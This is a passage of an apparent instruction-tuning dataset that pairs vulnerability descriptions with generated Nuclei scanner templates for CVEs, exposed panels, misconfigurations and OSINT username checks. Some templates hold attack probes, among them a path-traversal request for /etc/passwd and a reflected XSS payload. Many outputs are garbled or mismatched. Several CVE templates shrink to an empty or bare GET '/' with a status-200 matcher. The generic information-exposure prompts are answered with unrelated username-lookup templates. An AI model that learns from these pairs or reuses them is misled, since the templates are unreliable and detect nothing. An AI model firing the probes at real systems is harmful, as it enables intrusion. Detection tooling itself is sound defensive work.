"high", "id": "CWE-918"} +{"instruction": "Generate a Nuclei template for CVE-2022-25082", "input": "Title: OS Command Injection in totolink a950rg_firmware\nSummary: TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the \"Main\" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: totolink a950rg_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-25082\n\ninfo:\n name: TOTOLink - Unauthenticated Command Injection\n author: gy741\n severity: critical\n description: TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \".sh\" \n - \".cgi\" \n part: body_2\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-25082"} +{"instruction": "Generate a Nuclei template for CVE-2017-5645", "input": "Title: Deserialization of Untrusted Data in apache log4j and others\nSummary: In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: apache log4j, netapp oncommand_api_services, netapp oncommand_insight\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-5645\n\ninfo:\n name: Apache Log4j Server - Deserialization Command Execution\n author: princechaddha\n severity: critical\n description: In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-5645"} +{"instruction": "Generate a Nuclei template for: Larvel Debug Method Enabled", "input": "Title: Larvel Debug Method Enabled\nSummary: Larvel Debug Method Enabled. Larvel Debug method is enabled.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: laravel-debug-error\n\ninfo:\n name: Larvel Debug Method Enabled\n author: dhiyaneshDK\n severity: medium\n description: Larvel Debug method is enabled.\n tags: debug,laravel,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}///////this-should-not-exist,.<>!@#$%^&*()_+\" \n - \"{{BaseURL}}/%00\" \n matchers:\n - type: word\n words:\n - \"Whoops! There was an error\"", "category": "generic", "severity": "medium", "id": "laravel-debug-error"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: newmeet\n\ninfo:\n name: Newmeet User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Newmeet user name information check was conducted.\n tags: osint,osint-dating,newmeet,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.newmeet.com/en/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"The profile of\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Cassia Bluetooth Gateway Panel - Detect", "input": "Title: Cassia Bluetooth Gateway Panel - Detect\nSummary: Cassia Bluetooth Gateway Panel - Detect. Cassia Bluetooth Gateway Management Platform login page was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cassia-bluetooth-gateway-panel\n\ninfo:\n name: Cassia Bluetooth Gateway Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: Cassia Bluetooth Gateway Management Platform login page was discovered.\n tags: cassia,gateway,login,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cassia/login\" \n matchers:\n - type: word\n words:\n - \"Cassia Bluetooth Gateway Management Platform\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cassia-bluetooth-gateway-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: buzzfeed\n\ninfo:\n name: BuzzFeed User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: BuzzFeed user name information check was conducted.\n tags: osint,osint-social,buzzfeed,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.buzzfeed.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"memberSince\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2019-20176", "input": "Title: Vulnerability (CWE-400) in pureftpd pure-ftpd and others\nSummary: In Pure-FTPd 1.0.49, a stack exhaustion issue was discovered in the listdir function in ls.c.\nVulnerability Type: Vulnerability (CWE-400)\nSeverity: high\nAffected Products: pureftpd pure-ftpd, fedoraproject fedora\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-20176\n\ninfo:\n name: Pure-FTPd < 1.0.50 - DoS via Resource Exhaustion\n author: pussycat0x\n severity: high\n description: Pure-FTPd versions prior to 1.0.50 are vulnerable to resource exhaustion leading to denial of service. The vulnerability occurs in the listdir() function when processing crafted LIST commands, causing stack exhaustion that can crash the FTP server.\n tags: cve,cve2019,network,ftp,pure-ftpd,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-20176"} +{"instruction": "Generate a Nuclei template for: Spring Boot Security Checks", "input": "Title: Spring Boot Security Checks\nSummary: Spring Boot Security Checks. A simple workflow that runs all Spring Boot related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: springboot-workflow\n\ninfo:\n name: Spring Boot Security Checks\n author: dwisiswant0\n severity: info\n description: A simple workflow that runs all Spring Boot related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "springboot-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2024-31850", "input": "Title: Path Traversal in CVE-2024-31850\nSummary: A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-31850\n\ninfo:\n name: CData Arc < 23.4.8839 - Path Traversal\n author: DhiyaneshDK\n severity: high\n description: A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n tags: cve,cve2024,cdata,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.rst\" \n matchers:\n - type: word\n words:\n - \"<title>CData Arc\" \n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"items\":[{\" \n - \":\"true\"\" \n - \"notifyemail\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-31850"} +{"instruction": "Generate a Nuclei template for: Cookies without HttpOnly attribute - Detect", "input": "Title: Cookies without HttpOnly attribute - Detect\nSummary: Cookies without HttpOnly attribute - Detect. Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cookies-without-httponly\n\ninfo:\n name: Cookies without HttpOnly attribute - Detect\n author: RJ Coleman,Mr.Bobo HP\n severity: info\n description: Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\n tags: misconfig,http,cookie,generic,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cookies-without-httponly"} +{"instruction": "Generate a Nuclei template for: PhotoPrism - Unauth Access", "input": "Title: PhotoPrism - Unauth Access\nSummary: PhotoPrism - Unauth Access. PhotoPrism is an AI-powered photos app for the decentralized web. This template detects instances that are accessible without authentication, potentially exposing sensitive user data and photos.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: photoprism-unauth\n\ninfo:\n name: PhotoPrism - Unauth Access\n author: ritikchaddha\n severity: high\n description: PhotoPrism is an AI-powered photos app for the decentralized web. This template detects instances that are accessible without authentication, potentially exposing sensitive user data and photos.\n tags: photoprism,misconfig,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "photoprism-unauth"} +{"instruction": "Generate a Nuclei template for: Containers sharing host IPC namespace", "input": "Title: Containers sharing host IPC namespace\nSummary: Containers sharing host IPC namespace. Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: k8s-containers-share-host-ipc\n\ninfo:\n name: Containers sharing host IPC namespace\n author: princechaddha\n severity: critical\n description: Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks.\n tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "k8s-containers-share-host-ipc"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: codementor\n\ninfo:\n name: Codementor User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Codementor user name information check was conducted.\n tags: osint,osint-coding,codementor,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.codementor.io/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"ABOUT ME\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Deployment Management Interface - Exposed", "input": "Title: Deployment Management Interface - Exposed\nSummary: Deployment Management Interface - Exposed. Deployment Management Interface is exposed. This exposure could potentially allow unauthorized access to the management interface\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: deployment-interface-exposed\n\ninfo:\n name: Deployment Management Interface - Exposed\n author: DhiyaneshDK\n severity: medium\n description: Deployment Management Interface is exposed. This exposure could potentially allow unauthorized access to the management interface\n tags: deployment,management,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"<title>Deployment Management Interface\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "deployment-interface-exposed"} +{"instruction": "Generate a Nuclei template for: Dead Letter Topic Not Enabled for Google Pub/Sub Subscriptions", "input": "Title: Dead Letter Topic Not Enabled for Google Pub/Sub Subscriptions\nSummary: Dead Letter Topic Not Enabled for Google Pub/Sub Subscriptions. Ensure that each Google Cloud Pub/Sub subscription is configured to use a dead-letter topic (DLQ) to capture undeliverable messages. Pub/Sub subscriptions allow for a maximum number of delivery attempts. Messages that cannot be delivered after the maximum attempts are sent to the dead-letter topic, ensuring they can be reviewed and handled appropriately.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: gcloud-pubsub-deadletter-disabled\n\ninfo:\n name: Dead Letter Topic Not Enabled for Google Pub/Sub Subscriptions\n author: princechaddha\n severity: low\n description: Ensure that each Google Cloud Pub/Sub subscription is configured to use a dead-letter topic (DLQ) to capture undeliverable messages. Pub/Sub subscriptions allow for a maximum number of delivery attempts. Messages that cannot be delivered after the maximum attempts are sent to the dead-letter topic, ensuring they can be reviewed and handled appropriately.\n tags: cloud,devops,gcp,gcloud,google-cloud-pubsub,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "gcloud-pubsub-deadletter-disabled"} +{"instruction": "Generate a Nuclei template for: Cascade CMS Panel - Detect", "input": "Title: Cascade CMS Panel - Detect\nSummary: Cascade CMS Panel - Detect. Cascade CMS was detected \u2014 a web content management system for managing stand-out websites.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cascade-cms-panel\n\ninfo:\n name: Cascade CMS Panel - Detect\n author: righettod\n severity: info\n description: Cascade CMS was detected \u2014 a web content management system for managing stand-out websites.\n tags: panel,cascade,detect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.act\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "cascade-cms-panel"} +{"instruction": "Generate a Nuclei template for CVE-2020-35598", "input": "Title: Path Traversal in advanced_comment_system_project advanced_comment_system\nSummary: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. NOTE: this might be the same as CVE-2009-4623\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: advanced_comment_system_project advanced_comment_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-35598\n\ninfo:\n name: Advanced Comment System 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.\n tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-35598"} +{"instruction": "Generate a Nuclei template for: Canopy 5.7GHz Access Point - Default Login", "input": "Title: Canopy 5.7GHz Access Point - Default Login\nSummary: Canopy 5.7GHz Access Point - Default Login. Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cambium-networks-default-login\n\ninfo:\n name: Canopy 5.7GHz Access Point - Default Login\n author: defektive\n severity: high\n description: Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered.\n tags: default-login,cambium,canopy,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Logged in as root\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "cambium-networks-default-login"} +{"instruction": "Generate a Nuclei template for: ClipBucket Installer - Exposure", "input": "Title: ClipBucket Installer - Exposure\nSummary: ClipBucket Installer - Exposure. ClipBucket is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: clipbucket-installer\n\ninfo:\n name: ClipBucket Installer - Exposure\n author: DhiyaneshDk\n severity: high\n description: ClipBucket is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,clipbucket,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cb_install/\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "clipbucket-installer"} +{"instruction": "Generate a Nuclei template for: mega phishing Detection", "input": "Title: mega phishing Detection\nSummary: mega phishing Detection. A mega phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mega-phish\n\ninfo:\n name: mega phishing Detection\n author: rxerium\n severity: info\n description: A mega phishing website was detected\n tags: phishing,mega,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Home - MEGA\" \n - \"Secure and private cloud storage for everyone. Store and share files, chat, meet, back up, sync, and more.\" \n condition: and\n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "mega-phish"} +{"instruction": "Generate a Nuclei template for: AsyncAPI Spec Inventory", "input": "Title: AsyncAPI Spec Inventory\nSummary: AsyncAPI Spec Inventory. Detected publicly accessible AsyncAPI specification files (YAML/JSON), which might have exposed message channels, server endpoints, and security schemes.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: asyncapi-inventory\n\ninfo:\n name: AsyncAPI Spec Inventory\n author: hamzasahin61\n severity: info\n description: Detected publicly accessible AsyncAPI specification files (YAML/JSON), which might have exposed message channels, server endpoints, and security schemes.\n tags: exposure,asyncapi,api,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/asyncapi\" \n - \"{{BaseURL}}/asyncapi.yaml\" \n - \"{{BaseURL}}/asyncapi.yml\" \n - \"{{BaseURL}}/asyncapi.json\" \n - \"{{BaseURL}}/api/asyncapi\" \n - \"{{BaseURL}}/api/docs/asyncapi\" \n - \"{{BaseURL}}/docs/asyncapi\" \n matchers:\n - type: regex\n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "asyncapi-inventory"} +{"instruction": "Generate a Nuclei template for CVE-2025-1974", "input": "Title: Vulnerability (CWE-653) in CVE-2025-1974\nSummary: A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)\nVulnerability Type: Vulnerability (CWE-653)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-1974-k8s\n\ninfo:\n name: Ingress-Nginx Controller - Unauthenticated Remote Code Execution\n author: princechaddha\n severity: critical\n description: A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller\n tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2025-1974"} +{"instruction": "Generate a Nuclei template for CVE-2017-18496", "input": "Title: Cross-Site Scripting (XSS) in bestwebsoft htaccess\nSummary: The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: bestwebsoft htaccess\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-18496\n\ninfo:\n name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\n tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2017-18496"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dotnet-remoting-service-detect\n\ninfo:\n name: Microsoft .NET Remoting httpd - Detect\n author: pussycat0x\n severity: info\n description: Microsoft .NET Remoting httpd was detected.\n tags: network,detect,microsoft,dotnet,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: livejournal\n\ninfo:\n name: Livejournal User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Livejournal user name information check was conducted.\n tags: osint,osint-blog,livejournal,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://{{user}}.livejournal.com\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\" \n - \"\" \n - \"\" \n - \"Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.\" \n - \"Bolt \u00bb Login\" \n - \"Cookies are required to log on to Bolt. Please allow cookies.\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Android Debug Manager", "input": "Title: Android Debug Manager\nSummary: Android Debug Manager. Android Debug Manger is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: android-debug-database-exposed\n\ninfo:\n name: Android Debug Manager\n author: dhiyaneshDK\n severity: low\n description: Android Debug Manger is exposed.\n tags: unauth,android,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Android Debug Database\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "android-debug-database-exposed"} +{"instruction": "Generate a Nuclei template for CVE-2022-1439", "input": "Title: Cross-Site Scripting (XSS) in microweber microweber\nSummary: Reflected XSS on demo.microweber.org/demo/module/ in GitHub repository microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press \"tab\" but there is probably a paylaod that runs without user interaction.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: microweber microweber\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-1439\n\ninfo:\n name: Microweber <1.2.15 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,microweber,xss,huntr,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"
ASPECT Control Panel\" \n - \"src=\"libjs/pngfix.js\"\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: DoorGets CMS v7.0 - Information Disclosure", "input": "Title: DoorGets CMS v7.0 - Information Disclosure\nSummary: DoorGets CMS v7.0 - Information Disclosure. doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: doorgets-info-disclosure\n\ninfo:\n name: DoorGets CMS v7.0 - Information Disclosure\n author: r3Y3r53\n severity: high\n description: doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password.\n tags: doorgets,cms,packetstorm,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/v12/setup/temp/admin.php\" \n matchers:\n - type: word\n words:\n - \":\"email\";\" \n - \":\"password\";\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "doorgets-info-disclosure"} +{"instruction": "Generate a Nuclei template for: Brute Ratel C4 - Detect", "input": "Title: Brute Ratel C4 - Detect\nSummary: Brute Ratel C4 - Detect. Brute Ratel C4 (BRc4) is a legit red-teaming tool designed from the ground up with evasion capabilities in mind, but in the wrong hands can cause significant damage. Learn how to protect your organization with our Brute Ratel C4 Spotlight.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: brute-ratel-c4\n\ninfo:\n name: Brute Ratel C4 - Detect\n author: pussycat0x\n severity: info\n description: Brute Ratel C4 (BRc4) is a legit red-teaming tool designed from the ground up with evasion capabilities in mind, but in the wrong hands can cause significant damage. Learn how to protect your organization with our Brute Ratel C4 Spotlight.\n tags: c2,bruteratel,c4,panel,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "brute-ratel-c4"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: horde-login-panel\n\ninfo:\n name: Horde Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: Horde login panel was detected.\n tags: horde,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/horde/login.php\" \n - \"{{BaseURL}}/login.php\" \n matchers:\n - type: word\n words:\n - \"HordeLogin.user\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: motive-eim-panel\n\ninfo:\n name: Motive eSIM Secure Connect Panel - Exposure Detection\n author: miguelse\n severity: high\n description: Detects exposed Motive eSIM Secure Connect (EIM) panels used for managing eSIM/iSIM provisioning. Public access to these interfaces may allow attackers to view or interact with sensitive operations such as EID management and bulk provisioning, leading to information disclosure or unauthorized control over IoT/mobile connectivity services.\n tags: panel,motive,eim,esim,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/eIMConfiguration\" \n - \"{{BaseURL}}/eid-management\" \n - \"{{BaseURL}}/eid-management-new\" \n - \"{{BaseURL}}/bulk-profile-operation\" \n matchers:\n - type: word\n words:\n - \"EIM\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: tellonym\n\ninfo:\n name: Tellonym User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Tellonym user name information check was conducted.\n 